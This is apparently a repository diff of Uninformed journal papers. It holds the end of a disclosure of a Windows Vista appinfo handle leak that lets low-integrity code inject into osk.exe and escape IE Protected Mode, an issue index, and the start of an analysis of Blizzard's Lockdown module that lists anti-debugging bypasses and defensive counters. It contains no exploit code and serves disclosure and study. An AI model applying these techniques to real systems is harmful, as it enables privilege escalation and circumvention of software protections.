would generally run at medium integrity as well. Games tend to be rather
poorly written in terms of awareness of the security system, however, so this
tends to not really be the case, at least not without added help from the
operating system. Medium integrity roughly corresponds to the environment
that a limited user would run as under previous versions of Windows. That is
to say, the user has read and write access to their own user profile and their
own registry hive, but not write access to the system as a whole.
Now, when a user launches Internet Explorer, an IExplore.exe process is
launched as low integrity. The default security descriptor for most objects
on Windows prevents low integrity processes from gaining write access to
medium integrity securable objects, as previously mentioned. In reality, the
default security descriptor denies write access to higher integrities, not
just to medium integrity, though in this case the effect is similar in terms
of Internet Explorer. As a result, the IExplore.exe process cannot write
directly to most locations on the system.
However, Internet Explorer does, in certain cases, need to gain write to
locations outside of the low integrity (Protected Mode) sandbox. For this
task, Internet Explorer relies on a helper process, known as ieuser.exe, which
runs at medium integrity level. There is a tightly controlled RPC interface
between ieuser.exe and IExplore.exe that allows Internet Explorer, running at
low integrity, to request that ieuser.exe display a dialog box asking the user
to, say, choose a save location for a file and then save said file to disk.
This is the mechanism by which one can save files in their home directory even
under Protected Mode. Because the RPC interface only allows IExplore.exe
to use the RPC interface to request that a file to be saved, a program cannot
directly abuse the RPC interface to write to arbitrary locations, at least not
without user interaction.
Part of the reason why the RPC interface cannot be trivially abused is that
there also exists some protection baked into the window manager that prevents
a thread at a lower integrity level from sending certain, potentially
dangerous, messages to threads at a higher integrity level. This allows
ieuser.exe to safely display user interface on the same desktop as the
IExplore.exe process without malicious code in the Internet Explorer process
simply being able to simulate fake keystrokes in order to cause it to save a
dangerous file to a dangerous location without user interaction.
Most programs that are integrity-level aware operate with the same sort of
paradigm that Internet Explorer does. In such programs, there is typically a
higher integrity broker process that provides a tightly controlled interface
to request that certain actions be taken, with the consent of the user. For
example, UAC has a broker process (a privileged service) that is responsible
for displaying the consent user interface when the user tries to perform an
administrative task. This operates similar in principal to how Internet
Explorer can provide a security barrier through Protected Mode because the
lower privileged process (the user program) cannot magically elevate itself
to full administrative rights in the UAC case (which runs a program at high
integrity level, as opposed to the default medium integrity level).
Instead, it could only ask the service to display the consent UI, which is
protected from interference by the program requesting elevation due to the
window manager restrictions on sending dangerous messages to a higher
integrity level window.
2) Breaking the Broker
If one has been using Windows Vista for some time, none of the behavior that
has just been described should come across as new. However, there are some
cases that have not yet been discussed which one might have observed from time
to time with Windows Vista. For example, although programs are typically
restricted from being able to synthesize input across integrity levels, there
are some limited circumstances where this is permitted. One easy to see
instance of this is the on-screen keyboard program (osk.exe) which, despite
running without a UAC prompt, can generate keyboard input messages that are
transmitted to other processes, even elevated administrative processes. This
would at first appear to be a break in the security system; questions along
the lines of "If one program can magically send keystrokes to higher integrity
processes, why can't another?" come to mind. However, there are in fact some
carefully-designed restrictions that are intended to prevent a user (or a
program) from arbitrarily being able to execute custom code with this ability.
First of all, in order to request special access to send unrestricted keyboard
input, a program's main executable must resolve to a path within the Program
Files or Windows directory. Although the author feels that such a check is
essentially a giant hack at best, it does effectively prevent a "plain user"
running at medium integrity from being able to run custom code that can
synthesize keystrokes to high integrity processes, as a plain user would not
be able to write to any of these directories. Additionally, any such program
must also be signed with a valid digital signature from any trusted code
signing root. This is a fairly useless check from a security perspective, in
the author's opinion, as anybody can pay a code signing authority to get a
code signing certificate in their own name; code signing certificates are not
a guarantee of malware-free (or even bug-free) code. Although it would be
easy to bypass the second check with a payment to a certificate issuing
authority, a plain user cannot so easily bypass the first check relating to
the restriction on where the program main executable may be located.
Even if a user cannot launch custom code directly as a program with access to
simulate keystrokes to higher integrity processes (known as "uiaccess"
internally), one would tend to get the impression that it would be possible to
simply inject code into a running osk.exe instance (or other process with
uiaccess). This fails as well, however; the process that is responsible for
launching osk.exe (the same broken service that is responsible for launching
the UAC consent user interface, the "Application Information" (appinfo)
service) creates osk.exe with a higher than normal integrity level in order to
use the integrity level security mechanism to block users from being able to
inject code into a process with access to simulate keystrokes.
When the appinfo service receives a request to launch a program that may
require elevation, which occurs when ShellExecute is called to start a
program, it will inspect the user's token and the application's manifest to
determine what to do. The application manifest can specify that a program
runs with the user's integrity level, that it needs to be elevated (in which
case a consent user interface is launched), that it should be elevated if and
only if the current user is a non-elevated administrator (otherwise the
program is to be launched without elevation), or that the program requests the
ability to perform keystroke simulation to high integrity processes.
In the case of a launch request for a program requesting uiaccess,
appinfo!RAiLaunchAdminProcess is called to service the request. The process
is then verified to be within the (hardcoded) set of allowed directories by
appinfo!AiCheckSecureApplicationDirectory. After validating that the program
is being launched from within an allowed directory, control is eventually
passed to appinfo!AiLaunchProcess which performs the remaining work necessary
to service the launch request. At this point, due to the "secure" application
directory requirement, it is not possible for a limited user (or a user
running with low integrity, for that matter) to place a custom executable in
any of the "secure" application directories.
Now, the appinfo service is capable of servicing requests from processes of
all integrity levels. Due to this fact, it needs to be capable of determining
the correct integrity level to create a new process from at this point.
Because the new process is not being launched as a full administrator in the
case of a process requesting uiaccess, no consent user interface is displayed
for elevation. However, the appinfo service does still need a way to protect
the new process from any other processes running as that user (as access to
synthesize keystrokes is considered sensitive). For this task, the
appinfo!LUASetUIAToken function is called by appinfo to protect the new
process from other plain user processes running as the calling user. This
is accomplished by adjusting the token that will be used to create the new
process to run at a higher integrity level than the caller, unless the
caller is already at high integrity level (0x3000). The way LUASetUIAToken
does this is to first try to query the linked token associated with the
caller's token. A linked token is a second, shadow token that is assigned
when a computer administrator logs in with UAC enabled; in the UAC case,
the user normally runs as a restricted version of themselves, without their
administrative privileges (or Administrators group membership), and at
medium integrity level.
If the calling user does indeed have a linked token, LUASetUIAToken retrieves
the integrity level of the linked token for use with the new process.
However, if the user doesn't have a linked token (i.e. they are logged on as a
true plain user and not an administrator running without administrative
privileges), then LUASetUIAToken uses the integrity level of the caller's
token instead of the token linked with the caller's token (in other words, the
elevation token). In the case of a computer administrator this approach would
normally provide sufficient protection, however, for a limited user, there
exists a small snag. Specifically, the integrity level that LUASetUIAToken
has retrieved matches the integrity level of the caller, so the caller would
still have free reign over the process.
To counteract this issue, there is an additional check baked into
LUASetUIAToken to determine if the integrity level that was selected is at (or
above) high integrity. If the integrity level is lower than high integrity,
LUASetUIAToken adds 16 to the integrity level (although integrity levels are
commonly thought of as just having four values, that is, low, medium, high,
and system, there are 0x1000 unnamed integrity levels in between each named
integrity level). So long as the numeric value of the integrity level chosen
is greater than the caller's integrity level, the new process will be
protected from the caller. In the case of the caller already being a full,
elevated administrator, there's nothing to protect against, so LUASetUIAccess
doesn't attempt to raise the integrity level above high integrity.
After determining a final integrity level, LUASetUIAToken changes the
integrity level in the token that will be used to launch the new process to
match the desired integrity level. At this point, appinfo is ready to create
the process. If needed, the user profile block is loaded and an environment
block is created, following which advapi32!CreateProcessAsUser is called to
launch the uiaccess-enabled application for the caller with a raised integrity
level. After the process is created, the output parameters of
CreateProcessAsUser are marshalled back into the caller's process, and
AiLaunchProcess signals successful completion to the caller.
If one has been following along so far, the question of ``How does all of this
relate to Internet Explorer Protected Mode'' has probably crossed one's mind.
It turns out that there's a slight deficiency in the protocol outlined above
with respect to creating uiaccess processes. The problem lies in the fact
that AiLaunchProcess returns the output parameters of CreateProcessAsUser back
to the caller's process. This is dangerous, because in the Windows security
model, security checks are done when one attempts to open a handle; after a
handle is opened, the access rights requested are forever more associated with
that handle, regardless of who uses the handle. In the case of appinfo, this
turns out to be a real problem because appinfo, being the creator of the new
process, is handed back a thread and process handle that grant full access to
the new thread and process, respectively. Appinfo then marshals these handles
back to the caller (which may be running at low integrity level). At this
point, a privilege escalation problem has occured; the caller has been
essentially handed the keys to a higher integrity process. While the caller
would never normally be able to open a handle to the new process on its own,
in this case, it doesn't have to, as the appinfo service does so on its behalf
and returns the handles back to it.
Now, in the ShellExecute case, the client stub for the appinfo
AiLaunchAdminProcess routine doesn't want (or need) the process or thread
handles, and closes them immediately after. However, this is obviously not a
security barrier, as this code is running in the untrusted process and could
be patched out. As such, there exists a privilege escalation hole of sorts
with the appinfo service. It can be abused to, without user interaction, leak
a handle to a higher integrity process to a low integrity process (such as
Internet Explorer when operating in Protected Mode). Furthermore, even
Internet Explorer in Protected Mode, running at low integrity, can request to
launch an already-existing uiaccess-flagged executable, such as osk.exe (which
is conveniently already in a "secure" application directory, the Windows
system directory). With a process and thread handle as returned by appinfo,
it is possible to inject code into the new process, and from there, as they
say, the rest is history.
3) Caveats
Although the problem outlined in this article is indeed a privilege escalation
hole, there are some limitations to it. First of all, if the caller is
running as a plain user instead of a non-elevated administrator, appinfo
creates the uiaccess process with integrity level 0x1010 (low integrity + 16).
This is still less than medium integrity (0x2000), and thus in the true
limited user case, the new process, while protected from other low integrity
processes, is still unable to interfere with medium integrity processes
directly.
In the case where a user is running as an administrator but is not elevated
(which happens to be the default case for most Windows Vista users), it is
true that appinfo.exe returns a handle to a process running at high integrity
level. However, only the integrity level is changed; the process is most
certainly not an administrator (and in fact has BUILTIN\Administrators as a
deny only SID). This does mean that the new process is quite capable of
injecting code into any processes the user has started though (with zero user
interaction). If the user happens to already have a high integrity process
running on the desktop as a full administrator, the new process could be used
to attack it as the process would be running at the same integrity level and
it would additionally be running as the same user. This means that in the
default configuration, this issue can be used to escape from Protected Mode,
but one is still not given full-blown administrative access to the system.
However, any location in the user profile directory could be written to. This
effectively eliminates the security benefit of Protected Mode for a
non-elevated administrator (with respect to treating the user as a plain
user).
Source code to a simple program to demonstrate the appinfo service issue is
included with the article. The problem is at this point expected to be fixed
by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code
launches osk.exe with ShellExecute, patches out the CloseHandle calls in
ShellExecute to retain the process and thread handles, and then injects a
thread into osk.exe that launches cmd.exe. The sample program also includes a
facility to create a low integrity process to verify correct function; the
intended use is to launch a low integrity command shell, verify that
directories such as the user profile directory cannot be written to, and then
use the sample program from the low integrity process to launch a medium
integrity cmd.exe instance without user interaction, which does indeed have
free reign of the user profile directory. The same code will operate in the
context of Internet Explorer in Protected Mode, although in the interest of
keeping the example clear and concise, the author has not included code to
inject the sample program in some form into Internet Explorer (which would
simulate an attack on the browser).
Note that while the uiaccess process is launched as a high integrity process,
it is configured such that unless a token is explicitly provided that requests
high integrity, new child processes of the uiaccess process will launch as
medium integrity processes. It is possible to work around this issue and
retain high integrity with the use of CreateProcessAsUser by code injected
into the uiaccess process if desired. However, as described above, simply
retaining high integrity does not provide administrative access on its own.
If there are no other high integrity processes running as the current user on
the current desktop, running as high integrity and running as medium integrity
with the non-elevated token are functionally equivalent, for all intents and
purposes.
4) Conclusion
UAC, Internet Explorer Protected Mode, and the integrity level model represent
an entirely new way of thinking about security in the Windows world.
Traditionally, Windows security has been a user-based model, where all
processes that execute as a user were considered equally trusted. Windows
Vista and Windows Server 2008 are the first steps towards changing this model
to support the concept of a untrusted process (as opposed to an untrusted
user). While this has the potential to significantly benefit end user
security, as is the case with Internet Explorer Protected Mode, there are
bound to be bumps along the way. Writing an integrity level broker process is
difficult. It is very easy to make simple mistakes that compromise the
security of the integrity level mechanism, as the appinfo issue highlights.
The author would like to think that by shedding light on this type of
programming error, future issues of a similar vein may be prevented before
they reach end users.

1383
uninformed/8.4.txt Normal file

File diff suppressed because it is too large Load Diff

1822
uninformed/8.5.txt Normal file

File diff suppressed because it is too large Load Diff

1234
uninformed/8.6.txt Normal file

File diff suppressed because it is too large Load Diff

22
uninformed/8.txt Normal file
View File

@ -0,0 +1,22 @@
Engineering in Reverse
An Objective Analysis of the Lockdown Protection System for Battle.net
Skywing
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
html | pdf | txt
Exploitation Technology
ActiveX - Active Exploitation
warlord
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
html | pdf | txt
Context-keyed Payload Encoding
I)ruid
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
html | pdf | txt
Improving Software Security Analysis using Exploitation Properties
skape
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
html | pdf | txt

639
uninformed/9.1.txt Normal file
View File

@ -0,0 +1,639 @@
An Objective Analysis of the Lockdown Protection System for Battle.net
12/2007
Skywing
skywing@valhallalegends.com
Abstract
Near the end of 2006, Blizzard deployed the first major update to the version
check and client software authentication system used to verify the authenticity
of clients connecting to Battle.net using the binary game client protocol. This
system had been in use since just after the release of the original Diablo
game and the public launch of Battle.net. The new authentication module
(Lockdown) introduced a variety of mechanisms designed to raise the bar with
respect to spoofing a game client when logging on to Battle.net. In addition,
the new authentication module also introduced run-time integrity checks of
client binaries in memory. This is meant to provide simple detection of many
client modifications (often labeled "hacks") that patch game code in-memory in
order to modify game behavior. The Lockdown authentication module also
introduced some anti-debugging techniques that are designed to make it more
difficult to reverse engineer the module. In addition, several checks that
are designed to make it difficult to simply load and run the Blizzard
Lockdown module from the context of an unauthorized, non-Blizzard-game
process. After all, if an attacker can simply load and run the Lockdown
module in his or her own process, it becomes trivially easy to spoof the game
client logon process, or to allow a modified game client to log on to
Battle.net successfully. However, like any protection mechanism, the new
Lockdown module is not without its flaws, some of which are discussed in
detail in this paper.
1) Introduction
The Lockdown module is a part of several schemes that attempt to make it
difficult to connect to Battle.net with a client that is not a "genuine"
Blizzard game. For the purposes of this paper, the author considers both
modified/"hacked" Blizzard game clients, and third-party client software,
known as "emubots", as examples of Battle.net clients that are not genuine
Blizzard games. The Battle.net protocol also incorporates a number of schemes
(such as a proprietary mechanism for presenting a valid CD-Key for inspection
by Battle.net, and a non-standard derivative of the SRP password exchange
protocol for account logon) that by virtue of being obscure and undocumented
make it non-trivial for an outsider to successfully log a non-genuine client
on to Battle.net.
Prior to the launch of the Lockdown module, a different system took its place and
filled the role of validating client software versions. The previous system
was resistant to replay attacks (caveat: a relatively small pool of challenge
response values maintained by servers makes it possible to use replay attacks
after observing a large number of successful logon attempts) by virtue of the
use of a dynamically-supplied checksum formula that is sent to clients (a
challenge, in effect). This formula was then interpreted by the predecessor
to the Lockdown module, otherwise known as the "ver" or "ix86ver" module,
and used to create a one-way hash of several key game client binaries. The
result response would then be sent back to the game server for verification,
with an invalid response resulting in the client being denied access to
Battle.net.
While the "ver" module provides some inherent resistance to some
types of non-genuine clients (such as those that modify Blizzard game binaries
on disk), it does little to stop in-memory modifications to Blizzard game
clients. Additionally, there is very little to stop an attacker from creating
their own client software (an "emubot") that implements the "ver" module's
checksum scheme, either by calling "ver" directly or through the use of a
third-party, reverse-engineered implementation of the algorithm implemented in
the "ver" module. It should be noted that there exists one basic protection
against third party software calling the "ver" module directly; the "ver"
series of modules are designed to always run part of the version check hash on
the caller process image (as returned by the Win32 API GetModuleFileNameA).
This poses a minor annoyance for third party programs. In order to bypass
this protection, however, one need only hook GetModuleFileNameA and fake the
result returned to the "ver" module.
Given the existing "ver" module's capabilities, the Lockdown module
represents a major step forward in the vein of assuring that only genuine
Blizzard client software can log on to Battle.net as a game client. The
Lockdown module is a first in many respects for Blizzard with respect to
releasing code that actively attempts to thwart analysis via a debugger
(and actively attempts to resist being called in a foreign process with
non-trivial mechanisms).
Despite the work put into the Lockdown module, however, it has proven perhaps
less effective than originally hoped (though the author cannot state the
definitive expectations for the Lockdown module, it can be assumed that a
"hacking life" of more than several days was an objective of the Lockdown
module). This paper discusses the various major protection systems embedded
into the Lockdown module and associated authentication system, potential
attacks against them, and technical counters to these attacks that Blizzard
could take in a future release of a new version check/authentication module.
Part of the problem the developers of the Lockdown module faced relates to
constraints on the environment in which the module operates. The author has
derived the following constraints currently in place for the module:
1. The server portion of the authentication system is likely static and does not
generate challenge/response values in real time. Instead, a pool of possible
values appear to be pregenerated and configured on the server.
2. The module needs to work on all operating systems supported by all Blizzard
games, which spans the gamut from Windows 9x to Windows Vista x64. Note that
there are provisions for different architectures, such as Mac OS, to use a
different system than Windows architectures.
3. The module needs to work on all versions of all Blizzard Battle.net games,
including previous versions. This is due to the fact that the module plays
an integral part in Battle.net's software version control system, and thus
is used on old clients before they can be upgraded.
4. Legitimate users should not see a high incidence of false positives, and it
is not desirable for false positives to result in automated permanent action
against legitimate users (such as account closure).
As an aside, in the author's opinion, the version check and authentication
system is not intended as a copy protection system for Battle.net, as it does
nothing to discourge additional copies of genuine Blizzard game software from
being used on Battle.net. In essence, the version check and authentication
system is a system that is designed to ensure that only copies of the
genuine Blizzard game software can log on to Battle.net. Copy protection
measures on Battle.net are provided through the CD-Key feature, wherein the
server requires that a user has a valid (and unique) CD-Key (for applicable
products).
2) Protection Schemes of the Lockdown Module
As a stark contrast to the old "ver" module, the Lockdown module includes a
number of active defense mechanisms designed to significantly strengthen the
module's resistance to attack (including either analysis or being tricked into
providing a "good" response to a challenge to an untrusted process).
The protection schemes in the Lockdown module can be broken up into several
categories:
1. Mechanisms to thwart analysis of the Lockdown module itself and the secret
algorithm it implements (anti-debugging/anti-reverse-engineering).
2. Mechanisms to thwart the successful use of Lockdown in a hostile process to
generate a "good" response to a challenge from Battle.net (anti-emubot, and
by extension anti-hack, where "anti-hack" denotes a counter to modifications
of an otherwise genuine Blizzard game client).
3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game
client that is attempting to log on to Battle.net (anti-hack).
In addition, the Lockdown module is also responsible for implementing a
reasonable facsimile of the original function of the "ver" module; that is, to
provide a way to authoritatively validate the version of a genuine Blizzard
game client, for means of software version control (e.g. the deployment of
the correct software updates/patches to old versions of genuine Blizzard game
clients connecting to Battle.net).
In this vein, the following protection schemes are present in the Lockdown
module and associated authentication system:
2.1) Clearing the Processor Debug Registers
The x86 family of processors includes a set of special registers that are
designed to assist in the debugging of programs. These registers allow a user
to cause the processor to stop when a particular memory location is accessed,
as an instruction fetch, as a data read, or as a data write. This debugging
facility allows a user (debugger) to set up to four different virtual addresses
that will trap execution when referenced in a particular way. The use of these
debug registers to set traps on specific locations is sometimes known as
setting a hardware breakpoint", as the processor's dedicated debugging
support (in-hardware) is being utilized.
Due to their obvious utility to anyone attempting to analyze or reverse
engineer the Lockdown module, the module actively attempts to disable this
debugging aid by explicitly zeroing the contents of the key debug registers in
the context of the thread executing the Lockdown module's version check
call, CheckRevision. All the requisite debug registers are cleared immediately
after the call to the CheckRevision routine in the Lockdown module is made.
This protection mechanism constitutes an anti-debugging scheme.
2.2) Memory Checksum Performed on the Lockdown Module
The Lockdown module, contrary to the behavior of its predecessor, implements
a checksum of several key game executable files in-memory instead of on-disk.
In addition to the checksum over certain game executables, the Lockdown
module includes itself in the list of modules to be checksumed. This provides
several immediate benefits:
1. Attempts to set conventional software breakpoints on routines inside the
Lockdown module will distort the result of the operation, frustrating
reverse engineering attempts. This is due to the fact that so-called
software breakpoints are implemented by patching the instruction at the
target location with a special instruction (typically `int 3') that causes
the processor to break into the debugger. The alteration to the module's
executable code in memory causes the checksum to be distorted, as the `int 3'
opcode is checksumed instead of the original opcode.
2. Attempts to bypass other protection mechanisms in the Lockdown module are
made more difficult, as an untrusted process that is attempting to cause the
Lockdown module to produce correct results via patching out certain other
protection mechanisms will, simply by virtue of altering Lockdown code
in-memory, inadvertently alter the end result of the checksum operation. The
success of this aspect of the memory checksum protection is related to the
fact that the Lockdown module attempts to disable hardware breakpoints as
well. These two protection mechanisms thus complement eachother in a strong
fashion, such that a naive attempt to compromise one of the protection
schemes would usually be detected by the other scheme. In effect, the result
is a rudimentary "defense in depth" approach to software protection schemes
that is the hallmark of most relatively successful protection schemes.
3. The inclusion of the version check module itself in the result of the output
of the checksum is entirely new to the version check and client
authentication system, and as such poses an additional, unexpected "speed
bump" to persons attempting to reimplement the Lockdown algorithm in their
own code.
This protection mechanism has characteristics of both an anti-debugging,
anti-hack, and anti-emubot system.
2.3) Hardcoding of Module Base Addresses
As mentioned previously, the Lockdown module now implements a checksum over
game executables in-memory instead of on-disk. Taking advantage of this
change, the Lockdown module can hardcode the base address of the main process
executable at the default address of 0x00400000. This is safe because no
Blizzard game executable includes base relocation information, and as a result
will never change from this base address.
By virtue of hardcoding this address, it becomes more difficult for an
untrusted process to successfully call the Lockdown module. Unless the
programmer is particularly clever, he or she may not notice that the Lockdown
module is not actually performing a checksum over the main executable for the
desired Blizzard game, but instead the main executable of the untrusted process
(the default address for executables in the Microsoft linker program is the
same 0x00400000 value used in Blizzard's main executables comprising their
game clients).
While it is possible to change the base address of a program at link-time,
which could be done by a third-party process in an attempt to make it possible
to map the desired Blizzard main executable at the 0x00400000 address, it is
difficult to pull this off under Windows NT. This is because the 0x00400000
address is low in the address space, and the default behavior of the kernel's
memory manager is to find new addresses for memory allocations starting from
the bottom of the address space. This means that in virtually all cases, a
virgin Win32 process will already have an allocation (usually one of the shared
sections used for communication with CSRSS in the author's experience) that is
overlapping the address range required by the Lockdown module for the main
executable of the Blizzard game for which a challenge response is being
computed. While it is possible to change this behavior in the Windows NT
memory manager and cause allocations to start at the top of the address space
and search downwards, this is not the default configuration and is also a
relatively not-well-known kernel option. The fact that all users would need to
be reconfigured to change the default allocation search preference for an
untrusted process to typically successfully map the desired Blizzard game
executable makes this approach relatively painful for a would-be attacker.
The Lockdown module also ensures that the return value of the
GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the
main process image is based at 0x00400000 as far as the loader is concerned.
The restriction on the base address of the game main executable module has the
unfortunate side effect that it will not be possible to take advantage of
Windows Vista's ASLR attack surface reduction capabilities, negatively
impacting the resistance of Blizzard games to certain classes of exploitation
that might impact the security of users.
This protection mechanism is primarily considered to be an anti-emubot scheme,
as it is designed to guard against an untrusted process from succcessfully
calling the Lockdown module.
2.4) Video Memory Checksum
Another previously nonexistant component to the version check algorithm that is
introduced by the Lockdown module is a checksum over the video memory of the
process calling the Lockdown module. At the point in time where the module
is invoked by the Blizzard game, the portion of video memory checksummed should
correspond to part of the "Battle.net" banner in the log on screen for the
Blizzard game. The Lockdown module is currently only implemented for
so-called "legacy" game clients, otherwise known as clients that use Battle.snp
and the Storm Network Provider system for multiplayer access. This includes
all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and
Warcraft II: BNE. Future games, such as Diablo II, are not supported by the
Lockdown module.
This represents an additional non-trivial challenge to a would-be attacker.
Although the contents of the video memory to be checksummed is static, the way
that the Lockdown module retrieves the video memory pointers is through an
obfuscated call to several internal Storm routines (SDrawSelectGdiSurface,
SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of
internal state initialized by the Blizzard game during startup. This makes the
use of the internal Storm routines unlikely to simply work "out of the box" in
an untrusted process that has not gone to all the trouble to initialize the
Storm graphics subsystem and draw the appropriate data on the Storm video
surfaces.
This protection mechanism is primarily considered to be an anti-emubot scheme,
as it is designed to guard against an untrusted process from succcessfully
calling the Lockdown module.
2.5) Multiple Flavors of the Lockdown Module
The original "ver" module scheme pioneered a system wherein there were multiple
downloadable flavors of the version check module to be used by a client. The
Battle.net server sends the client a tuple of (version check module filename,
checksum formula and initialization parameters, version check module timestamp)
that is used in order to version (and download, if necessary) the latest copy
of the version check module. This mechanism provides for the possibility that
the Battle.net server could support multiple "flavors" of version check module
that could be distributed to clients in order to increase the amount of work
required by anyone seeking to reimplement the version check and authentication
system.
The original "ver" module and associated authentication scheme in fact utilized
such a scheme of multiple "ver" modules, and the Lockdown scheme expands upon
this trend. In the original system, there were 8 possible modules to choose
from; the Lockdown system, by contrast, expands this to a set of 20
possibilities. However, the version check modules in both systems are still
very similar to one another. In both systems, each module has its own unique
key (a 32-bit values in the "ver" system, and a 64-bit value in the Lockdown
system) that is used to influence the result of the version check checksum (it
should be noted that in the Lockdown system, the actual Lockdown module
itself is in essence a second "key", as the added checksum over the module
represents an additional adjustment to the final checksum result that changes
with each Lockdown module). This single difference is disguised by other
minor, superficial alterations to each module flavor; there are slight
differences by which module base addresses are retrieved, for instance, and
there are also other superficial differences that relate to differences like
code being moved between functions or functions being re-arranged in the final
binary in order to frustrate a simple "diff" of two Lockdown modules as
being informative in revealing the functional differences between the said two
modules.
This protection mechanism is perhaps best classed as an anti-analysis scheme,
as it attempts to create more work for anyone attempting to reverse engineer
the authentication system as a whole.
2.6) Authenticity Check Performed on Lockdown Module Caller
An additional new protection scheme introduced in the Lockdown module is a
rudimentary check on the authenticity of the caller of the module's export,
the CheckRevision routine. Specifically, the module attempts to ascertain
whether the return address of the call to the CheckRevision routine points to a
code location within the Battle.snp module. If the return pointer for the call
to CheckRevision is not within the expected range, then an error is
deliberately introduced into the checksum calculations, ultimately resulting in
the result returned by the Lockdown module becoming invalidated.
3) Attacks (and Counter-Attacks) on the Lockdown System
Though the Lockdown module introduces a number of new defensive mechanisms
that attempt to thwart would-be attackers, these systems are far from
fool-proof. There are a number of ways that these defensive systems could be
attacked (or subverted) by a would-be attacker who wishes to pass the version
and authentication check in the context of a non-genuine client for purposes of
logging on to Battle.net. In addition, there are also a variety of different
ways by which these proposed attacks could be thwarted in a future update to
the version check and authentication system.
3.1) Interception of SetThreadContext
As previously described, the Lockdown modules attempt to disable the use of
the processor's complement of debug registers in order to make it difficult
to utilize so-called hardware breakpoints during the process of reverse
engineering or analyzing a Lockdown module. This scheme is, at present,
relatively easily compromised, however.
There are several possible attacks that could be used:
1. Hook the SetThreadContext API and block attempts to disable debug registers
(programmatic).
2. Patch the import address table entry for SetThreadContext in the Lockdown
module to point to a custom routine that does nothing (programmatic).
3. Patch the Lockdown module instruction code to not call SetThreadContext in
the first place (programmatic). However, this is approach is considered to
be generally untenable, due to the memory checksum protection scheme.
4. Set a conditional breakpoint on `kernel32!SetThreadContext' that re-applies
the hardware breakpoint state after the call, or simply alters execution
flow to immediately return (debugger).
Depending on whether the attacker wants to make programmatic alterations to the
behavior of the Lockdown module via hardware breakpoints, or simply wishes
to observe the behavior of the module in the debugger unperturbed, there are
several options available.
The suggested counters include techniques such as the following:
1. Verify that the debug registers were really cleared. However, this could
simply be patched out as well. More subtle would be to include the value
of several debug registers in the checksum calculations, but this would also
be fairly obvious to attackers due to the fact that debug registers cannot be
directly accessed from user mode and require a call to Get/SetThreadContext,
or the underlying NtGet/SetContextThread system calls.
2. Include additional calls to disable debug register usage in different
locations within the Lockdown module. To be most effective, these would
need to be inlined and use different means to set the debug register state.
For example, one location could use a direct import, another could use a
GetProcAddress dynamic import, a third could manually walk the EAT of
kernel32 to find the address of SetThreadContext, and a fourth could make
a call to NtSetContextThread in ntdll, and a fifth could disassemble the
opcodes comprising NtSetContextThread, determine the system call ordinal,
and make the system call directly (e.g. via `int 2e'). The goal here is to
add additional work and eliminate "single points of failure" from the
perspective of an attacker seeking to disable the anti-debugging feature.
Note that the direct system call approach will require additional work in
order to function under Wow64 (e.g. x64 computers running native Windows
x64).
3. Verify that all IAT entries corresponding to kernel32 actually point to the
same module in-memory. This is risky, though, as in some cases (such as when
the Microsoft application compatibility layer module is in use), these APIs
may be legitimately detoured.
3.2) Use of Hardware Breakpoints
Assuming an attacker can compromise the anti-debugging protection scheme, then
he or she is free to make clever use of hardware breakpoints to disable other
protection systems (such as hardcoded base addresses of modules, checks on the
authenticity of a CheckRevision caller, and soforth) by setting execute fetch
breakpoints on choice code locations. Then, the attacker could simply alter
the execution context when the breakpoints are hit, in order to bypass other
protection mechanisms. For example, an attacker could set a read breakpoint
on the hardcoded base address for the main process image inside the Lockdown
module, and change the base address accordingly. The attacker would also
have to patch GetModuleHandleA in order to complete this example attack.
Suggested counters to attacks based on hardware breakpoints include:
1. Validation of the vectored exception handler chain, which might be used to
intercept STATUSSINGLESTEP exceptions when hardware breakpoints are hit.
This is risky, as there are legitimate reasons for there to be "foreign"
vectored exception handlers, however.
2. Checks to stop debuggers from attaching to the process, period. This is not
considered to be a viable solution since there are a number of legitimate
reasons for a debugger to be attached to a process, many of them which may
be unknown completely to the end user (such as profilers, crash control and
reporting systems, and other types of security software). Attempting to
block debuggers may also prevent the normal operation of Windows Error
